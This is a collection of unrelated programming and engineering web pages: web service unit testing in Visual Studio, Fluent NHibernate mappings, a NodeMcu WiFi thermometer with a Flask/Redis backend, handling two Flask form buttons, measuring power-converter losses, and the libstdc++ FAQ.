Unit test generation does not automatically add the AspNetDevelopmentServer attribute or the TryUrlRedirection method call. You must add these yourself. Both the attribute and the method are in Microsoft.VisualStudio.TestTools.UnitTesting.Web. Therefore, you will probably need a using or Imports statement, as shown in the following example.

Example Web Service Test Method

This is a simple test method that tests the HelloWorld() Web method of a Web service:

using Microsoft.VisualStudio.TestTools.UnitTesting;
using Microsoft.VisualStudio.TestTools.UnitTesting.Web;
using TestProject1.localhost;

[TestMethod]
[AspNetDevelopmentServer("HelloWorldServer", @"C:\Documents and Settings\user\My Documents\Visual Studio 2005\WebSites\WebSite1")]
public void HelloWorldTest()
{
    HelloWorldService target = new HelloWorldService();
    Assert.IsTrue(
        WebServiceHelper.TryUrlRedirection(
            target,
            testContextInstance,
            "HelloWorldServer"),
        "Web service redirection failed.");

    string expected = "Hello World";
    string actual;
    actual = target.HelloWorld();
    Assert.AreEqual(
        expected,
        actual,
        "TestProject1.localhost.HelloWorldService.HelloWorld did not return the expected value.");
}

See Also

Tasks: How to: Generate a Unit Test; How to: Author a Unit Test; How to: Parameterize a Web Server
Reference: Microsoft.VisualStudio.TestTools.UnitTesting.Web; AspNetDevelopmentServerAttribute; TryUrlRedirection
Concepts: Web Servers in Visual Web Developer
https://docs.microsoft.com/en-us/previous-versions/ms243399%28v%3Dvs.80%29
Fluent NHibernate Has a Wiki

Fluent NHibernate (previously covered by InfoQ) is an alternative to using XML mappings in NHibernate. Fluent NHibernate uses a fluent interface, allowing one to define mappings in code instead of XML. Some people in the community have complained about the lack of documentation for Fluent NHibernate, and as a response James Gregory recently announced the official Wiki for Fluent NHibernate. Examples of documentation found in the Wiki are:

- An introduction
- How to create your first Fluent NHibernate project
- How to convert an existing NHibernate application to Fluent NHibernate.

The Wiki shows a typical mapping scenario with both XML and Fluent NHibernate. Using XML it would look something like this: <>

The same mapping using Fluent NHibernate would look like this:

public class CatMap : ClassMap<Cat>
{
    public CatMap()
    {
        Id(x => x.Id);
        Map(x => x.Name)
            .WithLengthOf(16)
            .Not.Nullable();
        Map(x => x.Sex);
        References(x => x.Mate);
        HasMany(x => x.Kittens);
    }
}

They continue by saying:

While the separation of code and XML is nice, it can lead to several undesirable situations.

They then list some examples:

- Due to XML not being evaluated by the compiler, you can rename properties in your classes that aren't updated in your mappings; in this situation, you wouldn't find out about the breakage until the mappings are parsed at runtime.
- XML is verbose; NHibernate has gradually reduced the mandatory XML elements, but you still can't escape the verbosity of XML.
- Repetitive mappings - NHibernate HBM mappings can become quite verbose if you find yourself specifying the same rules over again. For example, if you need to ensure all string properties must be not-null and have a length of 1000, and all ints must have a default value of -1.

In August last year, Oren Eini (a.k.a. Ayende Rahien) pointed out that Fluent NHibernate didn't add any value because there had to be a mapping class per entity.
Since then, however, the project has evolved and it now has the concept of Auto Mapping, which is what Ayende was asking for. The Auto Mapping feature uses a set of conventions to automatically map all entities, without requiring a mapping class per entity.
http://www.infoq.com/news/2009/02/fluent-nhibernate-wiki
With IoT (Internet of Things) on the rise and hardware getting cheaper and cheaper, it's a great time to explore the possibilities this new technology provides. In this tutorial, I will show you how to create your own thermometer app using a NodeMcu microcontroller, a DHT22 temperature and humidity sensor and the Flask framework. We will use the NodeMcu to gather sensor data from our DHT22 sensor and send it to a REST API implemented in Flask. To read and display this data, we will create a simple HTML page which will download the data from our API.

You can check out the entire source code on my github page. You can buy all the hardware for a very cheap price on amazon or alibaba. I went with the NodeMcu and Breadboard starter kit on amazon.

Before we can write any code, we have to combine all the components required for the thermometer. We will connect our NodeMcu with the DHT22 sensor and power both components using a simple power supply. Let's start by (literally) wiring up our new hardware. First, grab an empty breadboard and put the power adapter on it.

Now, connect it to a battery using the power adapter. Before you connect the NodeMcu, make sure both switches that control the voltage are set to 3.3V, otherwise, you might fry the poor NodeMcu! Make sure everything works by pressing the power button.

Now it's time to put the NodeMcu on the board. Since my boards are very small, I had to add a second one to fit the NodeMcu comfortably.

Time to connect our NodeMcu with the power supply. Again, make sure the power supply is set to 3.3V.
We will use the negative pole of our power supply as the GND (Ground) pin, so let's use our jumper cables to connect one of the G pins of the NodeMcu to the negative pole. The 3V pin should then go to the positive pole of the power supply.

To make sure the power supply is connected correctly, you can flash the NodeMcu with a program to blink the LED. I will explain how you can overwrite the NodeMcu code later.

Finally, we can connect the DHT22 temperature sensor. As you can see in the DHT22 pinout, we have to connect the first pin to the positive terminal and the last pin to GND. The second pin is the data pin, which must be connected to the NodeMcu for it to read the sensor data. You can use any data pin on the NodeMcu for this, just make sure to remember which one you chose so you can easily program it later. I've chosen D2 as the data pin.

This concludes our trip into the hardware tinkering world for now. Put aside the board(s) and let's start writing some C code to give life to our newly created microcontroller.

There are many ways to write software for microcontrollers, but to keep things simple, I decided to stick with C. If you haven't written code for microcontrollers like a NodeMcu before, this is the most straightforward way. We will use the Arduino IDE to write the code for our NodeMcu and then flash it. Let's start by importing all the libraries we will need:

#include <SimpleDHT.h> // read temperature data from our DHT22 sensor
#include <ESP8266WiFi.h> // control the NodeMcu
#include <ESP8266HTTPClient.h> // send http requests from the NodeMcu

To use these libraries, go to Tools -> Library manager and search for and install the SimpleDHT and Adafruit libraries.
If you haven't worked with Arduino before, I recommend you check out some tutorials to get started. Once you feel comfortable with the IDE, let's continue by setting up our Wifi connection:

const char* ssid = "***";
const char* password = "***";

void setup_wifi() {
  WiFi.begin(ssid, password);
  while (WiFi.status() != WL_CONNECTED) {
    delay(1000);
    Serial.println("Connecting...");
  }
}

void setup() {
  Serial.begin(115200);
  setup_wifi();
}

void loop() {
}

The setup method will be called by the NodeMcu only once upon startup, so it's the perfect place to set up our WiFi connection initially. I put the WiFi code into its own method so we can re-use it later in case of connection problems. To see what our NodeMcu is doing during development time, I also set up a Serial connection. This way we can print errors to the Arduino Serial Monitor. The WiFi code tries to establish a connection every 1000ms. Once it succeeds, the loop will end and our setup code will be done. Flash the NodeMcu and open the Serial Monitor; you should see the "Connecting..." messages being printed until the connection succeeds.

Now, let's implement the loop method, which will be called continuously by our NodeMcu while it's activated:

SimpleDHT22 dht22(D2); // the DHT22 data pin is wired to D2

void loop() {
  byte temperature = 0;
  byte humidity = 0;
  int err = SimpleDHTErrSuccess;
  // read both temperature and humidity from the sensor
  if ((err = dht22.read(&temperature, &humidity, NULL)) != SimpleDHTErrSuccess) {
    // an error occurred: wait 2.5s and end this iteration of the loop
    delay(2500);
    return;
  }
  // print the acquired data to the Serial port
  Serial.print((int)temperature); Serial.print(" *C, ");
  Serial.print((int)humidity); Serial.println(" %");
  delay(2500);
}

Here, after declaring all required variables, we use the DHT22 library to read both the temperature and humidity from our sensor. If an error occurred, we wait for 2.5s and end the current iteration of the loop. Otherwise, we print the acquired data to the Serial port. Again, I added a 2.5s delay here. This is important because the DHT22 sensor only allows us to read data every 2s, so we have to give it some time after each request. Flash the NodeMcu again and open the Serial monitor.
The output should look like a temperature and humidity reading printed every 2.5 seconds.

This looks very nice already, but our goal is not to print the temperature data to the Serial monitor. Instead, we are going to send it to a RESTful API which can store this data and then make it available for display by some client:

if (WiFi.status() != WL_CONNECTED) {
  setup_wifi();
} else {
  HTTPClient http;
  http.begin("");
  http.addHeader("Content-Type", "text/plain");
  int httpCode = http.POST(String(temperature));
  http.end();
}

First, we have to check if we are still connected to our WiFi network. If not, we will simply call the setup_wifi() method again. Once we have established a connection, we can use the ESP8266HTTPClient library to send the sensor data to our API, hosted at the address passed to http.begin(). As you can see, I'm only sending the temperature data for now, but you can easily extend this code and also send the humidity data if you want. For now, nothing will change if you run this code. This is because we haven't created our API yet. So let's go ahead and do that.

If you got lost during any of the above steps, here is the full source code of our NodeMcu:

#include <SimpleDHT.h>
#include <ESP8266WiFi.h>
#include <ESP8266HTTPClient.h>

const char* ssid = "***";
const char* password = "***";

SimpleDHT22 dht22(D2); // the DHT22 data pin is wired to D2

void setup_wifi() {
  WiFi.begin(ssid, password);
  while (WiFi.status() != WL_CONNECTED) {
    delay(1000);
    Serial.println("Connecting...");
  }
  Serial.println("Connected successfully.");
}

void setup() {
  pinMode(2, OUTPUT);
  Serial.begin(115200);
  setup_wifi();
}

void loop() {
  byte temperature = 0;
  byte humidity = 0;
  int err = SimpleDHTErrSuccess;
  if ((err = dht22.read(&temperature, &humidity, NULL)) != SimpleDHTErrSuccess) {
    delay(2500);
    return;
  }
  Serial.print((int)temperature); Serial.print(" *C, ");
  Serial.print((int)humidity); Serial.println(" %");

  if (WiFi.status() != WL_CONNECTED) {
    setup_wifi();
  } else {
    HTTPClient http;
    http.begin("");
    http.addHeader("Content-Type", "text/plain");
    int httpCode = http.POST(String(temperature));
    http.end();
  }
  delay(2500);
}

Now that our NodeMcu is running and happily sending data, let's create an API to consume that data.
Using Python and the Flask framework, we can set up a simple API with less than 10 lines of code:

#!flask/bin/python
from flask import Flask
from flask_cors import CORS

app = Flask(__name__, static_url_path='')
CORS(app)

if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')

As you can see, I provided the static_url_path parameter. We will need this later so Flask can find and serve our HTML file. To give our API some power, we have to create a new controller for our thermometer API. For this, I created a new therm.py file inside a new /controllers directory:

from flask import Flask, Blueprint, request, jsonify
import flask
import redis

red = redis.StrictRedis.from_url('redis://redis:6379/0')
therm_controller = Blueprint('therm', 'therm', url_prefix='/therm')

def therm_stream():
    pub_sub = red.pubsub()
    pub_sub.subscribe('therm')
    for message in pub_sub.listen():
        if isinstance(message['data'], (bytes, bytearray)):
            result = message['data'].decode('utf-8')
            yield 'data: %s\n\n' % result

@therm_controller.route('/push', methods=['POST'])
def post():
    message = flask.request.data
    red.publish('therm', message)
    return flask.Response(status=204)

@therm_controller.route('/stream')
def stream():
    return flask.Response(therm_stream(), mimetype="text/event-stream")

As you can see, we are using Flask blueprints here to make it easier to expose this new controller to our app.py file. Our NodeMcu will use the post method with the '/push' route. This method reads the request data, which contains the sensor data from our NodeMcu, and publishes it to a Redis channel via the red client defined above. The stream route then returns a response backed by therm_stream, which yields a new event every time the NodeMcu pushes data to the API. This way we avoid polling and can always display the latest temperature on our client. therm_stream is a simple helper function that listens for messages on our Redis channel and decodes the data for display.
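The moving parts of therm_stream are easier to see with a plain in-memory queue standing in for the Redis pub/sub channel. This stand-in is purely illustrative (the real code blocks forever on pub_sub.listen(), while this sketch drains a finite queue), but the server-sent-event framing is the same:

```python
from queue import Queue

def therm_stream(channel):
    # Frame each published reading as a server-sent event: "data: ...\n\n".
    # Redis delivers message payloads as bytes, hence the decode step.
    while not channel.empty():
        message = channel.get()
        if isinstance(message, (bytes, bytearray)):
            yield 'data: %s\n\n' % message.decode('utf-8')

channel = Queue()
channel.put(b'21.5')  # what a POST to /therm/push would publish
channel.put(b'21.7')
print(list(therm_stream(channel)))  # ['data: 21.5\n\n', 'data: 21.7\n\n']
```

The blank line after each data: field is what tells the browser's EventSource that one event has ended and the next may begin.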
Since we have to listen to this stream continuously, this function is implemented as a generator. To connect our new controller with our API, let's include it in our app.py file:

#!flask/bin/python
from flask import Flask
from flask_cors import CORS
from controllers.therm import therm_controller

app = Flask(__name__, static_url_path='')
app.register_blueprint(therm_controller)
CORS(app)

if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')

Finally, we can implement a client to consume this API. Inside a new /static directory, create a new index.html file:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>mcu Therm</title>
</head>
<body>
    <h2 id="temp"></h2>
</body>
</html>
<script>
function subscribe() {
    var source = new EventSource('/therm/stream');
    var tempDiv = document.getElementById('temp');
    source.onmessage = function(e) {
        tempDiv.innerHTML = "Temperature: " + e.data + "°C";
    };
};
subscribe();
</script>

I placed the content inside a simple h2 element without any CSS to keep things simple. We can subscribe to our API with some simple JavaScript calls using the EventSource class. Its onmessage method is triggered whenever the stream is populated by the API. All we have to do then is update the innerHTML of our content. As you can see, I chose °C as the display unit (which is also what the NodeMcu sends). Feel free to add conversions to °F or Kelvin if you want.

We can download this new HTML page directly from our Flask API. To do so, we can define a new route in our app.py file:

@app.route('/')
def root():
    return app.send_static_file('index.html')

Since this file is also the entry point to our program, I named the route simply /. The send_static_file method will then take care of returning this HTML page to our client. To easily spin up, run and deploy our new app, we are going to initialize all our services using Docker Compose.
We only need two services: Redis and the Flask API. We can spin both of them up using this simple docker-compose.yml file, placed in the root directory of the project:

version: '3'
services:
  redis:
    image: redis
    command: redis-server /usr/local/etc/redis/redis.conf
    container_name: redis
    volumes:
      - ./redis.conf:/usr/local/etc/redis/redis.conf
    ports:
      - "6379:6379"
  web:
    build: ./src/webapp
    working_dir: /var/www/app
    ports:
      - "5000:5000"
    volumes:
      - ./src/webapp:/var/www/app:rw
    depends_on:
      - redis

The depends_on entry makes sure that the web service runs only after redis is initialized; check that all the ports used here match those used in the Python code. Now we can start our app using the docker-compose up command. Once everything is spun up, open a new browser tab and go to http://localhost:5000. Until we send some data to our Flask API, we will only see an empty page. So, let's go ahead and turn on our microcontroller. After a few seconds, you should see the current temperature displayed on the page, and you can watch this value change from time to time. You can see what's happening under the hood by opening a browser console and navigating to the Network tab.

That's it, our homemade thermometer app is ready! Feel free to play around with the source code and deploy it wherever you want, for example on a Raspberry Pi with an external display. Let me know if you have any questions or hints.
https://codeproject.freetls.fastly.net/Articles/1277175/WiFi-thermometer-using-NodeMCU-DHT22-and-Flask?msg=5597077#xx5597077xx
I'm trying to create two buttons on a page. I would like each one to carry out a different Python script on the server. So far I have only managed to handle one button, using:

def contact():
    form = ContactForm()
    if request.method == 'POST':
        return 'Form posted.'
    elif request.method == 'GET':
        return render_template('contact.html', form=form)

Give your two buttons the same name and different values:

<input type="submit" name="submit" value="Do Something">
<input type="submit" name="submit" value="Do Something Else">

Then in your Flask view function you can tell which button was used to submit the form:

def contact():
    form = ContactForm()
    if request.method == 'POST':
        if request.form['submit'] == 'Do Something':
            pass # do something
        elif request.form['submit'] == 'Do Something Else':
            pass # do something else
        else:
            pass # unknown
    elif request.method == 'GET':
        return render_template('contact.html', form=form)
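The branch on request.form['submit'] is plain dictionary dispatch, so you can sketch and test the routing logic without Flask at all. The return strings here are hypothetical stand-ins for your two server-side scripts:

```python
def dispatch(form):
    # `form` mimics request.form: route on the submit button's value
    action = form.get('submit')
    if action == 'Do Something':
        return 'ran script one'       # stand-in for the first script
    elif action == 'Do Something Else':
        return 'ran script two'       # stand-in for the second script
    return 'unknown button'

print(dispatch({'submit': 'Do Something'}))       # ran script one
print(dispatch({'submit': 'Do Something Else'}))  # ran script two
print(dispatch({}))                               # unknown button
```

In the real view, each branch would call the corresponding script instead of returning a label.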
https://codedump.io/share/M401Og7Cx4E0/1/flask-python-buttons
Efficiency Through the Looking-Glass

It was kind of like saying to treasure hunters, "Yeah, those pirate's chests full of gold coins are nice, but look what's in this cave back here...."

Well, efficiency is a double-edged sword. Twenty years ago, switching converters were a lot harder to justify (except in PC power supplies, where there really wasn't any choice anymore, and the sales volumes made it the norm rather than the exception), and in many cases just going from a linear regulator to a switching converter was enough to keep people satisfied for power consumption. Now it's a lot less expensive, and there are demands to achieve certain efficiency standards: where power supplies were 80% efficient, now people want them to be 90% efficient or 95% efficient; where some high-power converters were 95% efficient, people want them to be 97% efficient.

A former coworker of mine, who's a systems engineer working on batteries and motors, used to harp on the fact that efficiency was a misleading statistic; people should really focus on power losses instead. This article is dedicated to his philosophy and to spreading the word.

Welcome to Efficiencyland

First of all, what is efficiency? It's the ratio of delivered power to consumed power: if you draw 100 watts from the AC mains, and you deliver 90 watts of mechanical power with a motor, then that motor is 90% efficient. But really this is backwards: nobody goes to a store and says "I have an electric outlet that supplies 100W, what's the most efficient motor you have? Ooh, that's 90% efficient, that means I get 90W of mechanical power out!" In reality it's demand driven: you need that 90W of mechanical power no matter how efficient or inefficient the motor is. If the motor's 50% efficient, you draw 180W from the AC mains. If the motor's 95% efficient, you draw 94.7W from the AC mains.
Mathematically, we have this equation for the efficiency η: $$ \eta = \frac{P _ {out}}{P _ {in}} = \frac{P _ {out}}{P _ {out} + P _ {loss}} $$ Let's invert the equation: $$ \frac{1}{\eta} = \frac{P _ {in}}{P _ {out}} = \frac{P _ {out} + P _ {loss}}{P _ {out} } = 1 + \frac{ P _ {loss}}{P _ {out}}$$ If something is 50% efficient, the losses are equal to Pout. If something is 80% efficient, the losses are equal to 25% of Pout. If something is 95% efficient, the losses are equal to 1/19 of Pout. You get the picture. In fact, I would call this the relative inefficiency, a backwards epsilon: ∍ $$ \ni \, = \frac{ P _ {loss}}{P _ {out}} = \frac{1}{\eta} - 1 $$ Inefficiency in power calculations is just like a sales tax. In most cases you're going to spend the energy you need to, in order to deliver the output power, and this extra energy is an unwanted but necessary cost of power transfer. (In a few cases, like battery-powered devices, the amount of energy you can spend is a fixed constraint, and here efficiency tells you how much of it you have available to use.) But a lot of times it's not even relative inefficiency that makes sense to calculate; the losses themselves are the most important thing. Here's a graph of efficiency vs. output current for a small 2W power supply (Recom RS series): We'll do one of my favorite activities (don't miss the sarcasm), called Read the Data Off the Datasheet Graph. Let's see, at 5% load the efficiency's about 20%; at 10% load it's about 33% efficient, at 20% load it's about 50% efficient, at 40% load it's about 66% efficient, at 60% load it's about 75% efficient, at 80% load it's about 79% efficient, and at 100% load it's about 81% efficient. 
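Those spot checks ("50% efficient means losses equal Pout", "95% efficient means losses of Pout/19") follow directly from the inverted equation; here's the arithmetic spelled out:

```python
def relative_inefficiency(eta):
    # the "backwards epsilon": P_loss / P_out = 1/eta - 1
    return 1.0 / eta - 1.0

def power_loss(p_out, eta):
    # losses scale with output power, like a sales tax on delivered watts
    return p_out * relative_inefficiency(eta)

print(power_loss(100.0, 0.50))             # 100.0 W: losses equal P_out
print(round(power_loss(100.0, 0.80), 1))   # 25.0 W: 25% of P_out
print(round(power_loss(100.0, 0.95), 2))   # 5.26 W: P_out / 19
```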
Let's graph power loss (as a fraction of maximum load) as a function of load power: import numpy as np import matplotlib.pyplot as plt Pout = np.array([0.05, 0.1, 0.2, 0.4, 0.6, 0.8, 1.0]) eff = np.array([0.2, 0.33, 0.5, 0.66, 0.75, 0.79, 0.81]) Ploss = (1/eff - 1)*Pout plt.plot(Pout,Ploss) plt.xlabel('output power (fraction of max load)') plt.ylabel('power loss'); Huh, that's kind of interesting; the power loss is relatively constant, about 20% of max load (20% of 2W = 0.4W in this case), until you get to higher loads where the power loss goes up a little bit, maybe 10% of the increase in load power above 60% of maximum load: incrementally this power supply is about 90% efficient; for every 100mW of extra output power, it uses up 10mW of extra input power. At low load levels it takes a certain amount of power (again, 0.4W in this case) just to operate. And this kind of information is more directly useful. If you're careful, and you have access to a well-insulated thermal chamber (aka "styrofoam beer cooler") you can actually measure power loss directly: Put your power conversion system inside a thermal chamber, aside from the wires leading into and out of it, along with a thermocouple tied to a small block of metal (I like aluminum) for stability. Put the block of metal in close thermal proximity to your power conversion system. That usually means to attach the two directly together; if the power conversion system has a flat heat plate, place it directly against the block of metal, so the surfaces are next to each other. Thermally conductive grease is an option, but not really necessary as long as the thermal chamber is well-insulated. Run it for a specific amount of time T, while taking temperature readings. You will want to do this for a time that is long enough so see a measurable temperature rise, but not long enough that the power conversion system overheats or the rate of increase in temperature drops off and the temperature begins to stabilize. 
Calculate energy loss = temperature rise (in degrees C = degrees K) * thermal capacity in joules per kelvin. What's the thermal capacity? Well, if your block of metal is a common type of metal, you can calculate it by knowing the specific heat capacity, and multiplying by the metal mass; aluminum's is 0.897 joules / kelvin per gram. But it may be better to just figure out the heat capacity empirically, by doing the same experiment with a known amount of power loss, e.g. a power resistor tied to the block of metal, where you run a fixed current through it. If the power conversion system has an appreciable amount of metal itself, either make sure the block of metal is much larger, or you'll have to estimate the thermal capacity of the power conversion system. Then compute power loss by taking the energy loss and dividing by the time T. It's even better if you graph the temperature readings vs. time and compute the initial slope once it starts heating up: from scipy.signal import lfilter t = np.linspace(0,720,120) dt = t[1]-t[0] P = np.ones_like(t)*100 plt.figure(figsize=(10,5),dpi=80) plt.plot(t,P) a1 = 0.08*(dt/60) a2 = 4*(dt/60) lpf1 = lambda x, alpha: lfilter([alpha],[1,alpha-1],x) def frepeat(f,n,*args): def h(x): y = x for i in xrange(n): y = f(y, *args) return y return h temperature = lpf1(frepeat(lpf1,4,a2)(P),a1) plt.plot(t,temperature,'.') tfit = [0.42*60,5*60]; tempfit=[0,32] plt.plot(tfit,tempfit,'-') plt.ylim(0,60); plt.xlim(0,720); plt.xticks(np.arange(13)*60) plt.xlabel('time (sec)') plt.ylabel('temperature rise (C)') m = (tempfit[1]-tempfit[0])/(tfit[1]-tfit[0]) plt.legend(('raw data','max slope = %.3f' % m),'best') This gives you the temperature rise rate (kelvins per second), and you can multiply by thermal capacity to get joules per second = power in watts. Empirical measurements are fun! 
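As a sanity check on that recipe, here's the arithmetic for a hypothetical 500 g aluminum block; the mass and temperature-rise numbers are made up for illustration, only the 0.897 J/(K·g) specific heat comes from the text:

```python
SPECIFIC_HEAT_AL = 0.897  # joules per kelvin per gram, for aluminum

def power_loss_from_rise(mass_g, delta_T, duration_s):
    # energy loss = temperature rise * thermal capacity;
    # divide by the run time T to get watts
    thermal_capacity = SPECIFIC_HEAT_AL * mass_g   # J/K
    return thermal_capacity * delta_T / duration_s

# a 500 g block warming 8 K over 600 s of operation:
print(round(power_loss_from_rise(500.0, 8.0, 600.0), 2))  # 5.98 W dissipated
```

Using the initial slope instead of a single rise reading is the same computation with delta_T / duration_s replaced by the fitted kelvins-per-second value.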
They take a while to set up correctly, and although it's tough to estimate exactly how accurate they are, they are often more accurate than theoretical calculations where you make an incorrect assumption. Empirical measurements of power losses using this technique are also usually more accurate than subtracting input and output power measurements. If you're measuring a 95% efficient power supply running at 100W input and 95W output, and you have voltage and current measurements that each have 0.2% error, you could be off by 0.4W in input power and 0.4W in output power, meaning up to 0.8W worst-case error in power loss when you subtract the two (100.4W - 94.6W = 5.8W, or 99.6W - 95.4W = 4.2W, vs. the exact amount of 5.0W). That's 16% error in a 5W power loss measurement, from 0.2% accuracy test equipment! It's not too difficult to do better if you measure power loss directly via temperature rise measurements.

So... why do we care about power losses? The reason to talk about losses comes into play when the efficiency gets closer to 100%. When we talk about systems that are 94% efficient and 97% efficient, they sound about the same, whereas in reality the 97% efficient system has only half the power losses of the 94% efficient system. What's the impact on your power budget between these two systems? Probably not too much; you'd pay a little more for the extra energy used in a 94% efficient system. It may or may not be worth the extra cost of a 97% efficient system. But from a system design standpoint, the 97% efficient system is only allowed to waste half as much power as its 94% efficient competitor! That's a huge change in design requirements, and not very easy to achieve even with modern power supply design techniques.
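The worst-case subtraction-error figures a couple of paragraphs back can be checked in a few lines. This is a sketch, with the helper name my own: each power measurement is treated as carrying roughly 0.4% error (0.2% on voltage plus 0.2% on current), and the worst case is when the two errors push the loss estimate in the same direction:

```python
def power_loss_error_bounds(p_in, p_out, meas_err):
    """Worst-case apparent power loss when the input and output power
    measurements each carry a fractional error of +/- meas_err."""
    true_loss = p_in - p_out
    high = p_in * (1 + meas_err) - p_out * (1 - meas_err)  # loss overestimated
    low = p_in * (1 - meas_err) - p_out * (1 + meas_err)   # loss underestimated
    return true_loss, low, high

# 100 W in, 95 W out, ~0.4% per power measurement
loss, lo, hi = power_loss_error_bounds(100.0, 95.0, 0.004)
print(loss, lo, hi)  # about 5.0, 4.22 and 5.78 W
```

The bounds land close to the article's rounded 4.2W and 5.8W figures: around 16% uncertainty in a 5W loss measurement.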
In fact, the only real driver of high efficiency in the above-90% market (aside from marketing power, or meeting a high-efficiency standard) is keeping power losses low for thermal reasons: If I have a 10kW power converter that is 94% efficient, it has to dissipate 640W of heat. If I have a 10kW power converter that is 97% efficient, it only has to dissipate 310W of heat. That means less expensive fans or heat sinks, or no fans (natural convection cooling), or components that don't get as hot. But as far as the cost of the power goes, we're talking 10.64kW vs. 10.31kW; not a very big change.

Summary

- Power losses matter a lot more than efficiency metrics, especially if you're working with high-efficiency systems.
- Determining power losses at different operating points may give you better insights than efficiency into the weaknesses of a power conversion system: for example, quiescent power loss plus incremental losses.
- You can measure power loss directly in a thermal chamber by determining the thermal capacity and temperature rise rate.

Think about these issues the next time you work on a system that has power efficiency specifications. May your power electronics always stay cool!

Previous post by Jason Sachs: How to Estimate Encoder Velocity Without Making Stupid Mistakes: Part II (Tracking Loops and PLLs)
Next post by Jason Sachs: March is Oscilloscope Month — and at Tim Scale!

One reader comment: by analogy, efficiency numbers are unhelpful in the same way miles-per-gallon is unhelpful for cars.
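As a footnote to the 10kW example in the article, the heat-dissipation figures follow directly from Ploss = Pout*(1/eff - 1). A quick sketch (function name is mine; efficiency taken as output/input):

```python
def loss_and_input(p_out_w, efficiency):
    """Return (power loss, input power) in watts for a converter
    delivering p_out_w at the given efficiency (output/input)."""
    p_in = p_out_w / efficiency
    return p_in - p_out_w, p_in

loss94, pin94 = loss_and_input(10_000, 0.94)
loss97, pin97 = loss_and_input(10_000, 0.97)
print(round(loss94), round(loss97))  # 638 and 309 W of heat, the article's ~640 W vs ~310 W
print(round(pin94), round(pin97))    # 10638 and 10309 W of input power
```

Note the loss roughly halves while the input power, and hence the energy bill, barely moves.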
2008-2014 FSF

1.1. What is libstdc++?

The GNU Standard C++ Library v3 is an ongoing project to implement the ISO 14882 Standard C++ library as described in clauses 17 through 30 and annex D. For those who want to see exactly how far the project has come, or just want the latest bleeding-edge code, the up-to-date source is available over anonymous SVN, and can be browsed over the web.

1.2. Why should I use libstdc++?

The completion of the initial ISO C++ standardization effort gave the C++ community a powerful set of reusable tools in the form of the C++ Standard Library. However, for several years C++ implementations were (as the Draft Standard used to say) “incomplet and incorrekt”, and many suffered from limitations of the compilers that used them.

The GNU compiler collection (gcc, g++, etc.) is widely considered to be one of the leading compilers in the world. Its development is overseen by the GCC team. All of the rapid development and near-legendary portability that are the hallmarks of an open-source project are applied to libstdc++.

All of the standard classes and functions from C++98/C++03 (such as string, vector<>, iostreams, algorithms, etc.) are freely available and attempt to be fully compliant. Work is ongoing to complete support for the current revision of the ISO C++ Standard.

1.3. Who's in charge of it?

The libstdc++ project is contributed to by several developers all over the world, in the same way as GCC or the Linux kernel. The current maintainers are listed in the MAINTAINERS file (look for "c++ runtime libs").

Development and discussion is held on the libstdc++ mailing list. Subscribing to the list, or searching the list archives, is open to everyone. You can read instructions for doing so on the GCC mailing lists page. If you have questions, ideas, code, or are just curious, sign up!

1.4. When is libstdc++ going to be finished?
Nathan Myers gave the best of all possible answers, responding to a Usenet article asking this question: Sooner, if you help.

1.5. How do I contribute to the effort?

See the Contributing section in the manual. Subscribing to the mailing list (see above, or the homepage) is a very good idea if you have something to contribute, or if you have spare time and want to help. Contributions don't have to be in the form of source code; anybody who is willing to help write documentation, for example, or has found a bug in code that we all thought was working and is willing to provide details, is more than welcome!

1.6. What happened to the older libg++? I need that!

The last libg++ README states “This package is considered obsolete and is no longer being developed.” It should not be used for new projects, and won't even compile with recent releases of GCC (or most other C++ compilers). More information can be found in the Backwards Compatibility section of the libstdc++ manual.

1.7. What if I have more questions?

If you have read the documentation, and your question remains unanswered, then just ask the mailing list. At present, you do not need to be subscribed to the list to send a message to it. More information is available on the homepage (including how to browse the list archives); to send a message to the list, use <libstdc++@gcc.gnu.org>.

If you have a question that you think should be included here, or if you have a question about a question/answer here, please send email to the libstdc++ mailing list, as above.

2.1. What are the license terms for libstdc++?

See our license description for these and related questions.

2.2. So any program which uses libstdc++ falls under the GPL?

No. The special exception permits use of the library in proprietary applications.

2.3. How is that different from the GNU {Lesser,Library} GPL?

2.4. I see. So, what restrictions are there on programs that use the library?

None.
We encourage such programs to be released as free software, but we won't punish you or sue you if you choose otherwise.

3.1. How do I install libstdc++?

Often libstdc++ comes pre-installed as an integral part of many existing GNU/Linux and Unix systems, as well as many embedded development tools. It may be necessary to install extra development packages to get the headers, or the documentation, or the source: please consult your vendor for details.

To build and install from the GNU GCC sources, please consult the setup documentation for detailed instructions. You may wish to browse those files ahead of time to get a feel for what's required.

3.2. How does one get current libstdc++ sources?

Libstdc++ sources for all official releases can be obtained as part of the GCC sources, available from various sites and mirrors. A full list of download sites is provided on the main GCC site.

Current libstdc++ sources can always be checked out of the main GCC source repository using the appropriate version control tool. At this time, that tool is Subversion.

Subversion, or SVN, is one of several revision control packages. It was selected for GNU projects because it's free (speech), free (beer), and very high quality. The Subversion home page has a better description. The “anonymous client checkout” feature of SVN is similar to anonymous FTP in that it allows anyone to retrieve the latest libstdc++ sources. For more information see SVN details.

3.3. How do I know if it works?

Libstdc++ comes with its own validation testsuite, which includes conformance testing, regression testing, ABI testing, and performance testing. Please consult the testing documentation for GCC and Test in the libstdc++ manual for more details.

If you find bugs in the testsuite programs themselves, or if you think of a new test program that should be added to the suite, please write up your idea and send it to the list!

3.4. How do I ensure that the dynamically linked library will be found?
Depending on your platform and library version, the error message might be similar to one of the following:

./a.out: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
/usr/libexec/ld-elf.so.1: Shared object "libstdc++.so.6" not found

This means the dynamic linker searched its default list of directories for the library; if the directory containing libstdc++ is not in this list then the libraries won't be found. If you already have an older version of libstdc++ installed then the error might look like one of the following instead:

./a.out: /usr/lib/libstdc++.so.6: version `GLIBCXX_3.4.20' not found
./a.out: /usr/lib/libstdc++.so.6: version `CXXABI_1.3.8' not found

This means the linker found /usr/lib/libstdc++.so.6 but that library belongs to an older version of GCC than was used to compile and link the program a.out (or some part of it). The program depends on code defined in the newer libstdc++ that belongs to the newer version of GCC, so the linker must be told how to find the newer libstdc++ shared library.

The simplest way to fix this is to use the LD_LIBRARY_PATH environment variable, which is a colon-separated list of directories in which the linker will search for shared libraries:

export LD_LIBRARY_PATH=${prefix}/lib:$LD_LIBRARY_PATH

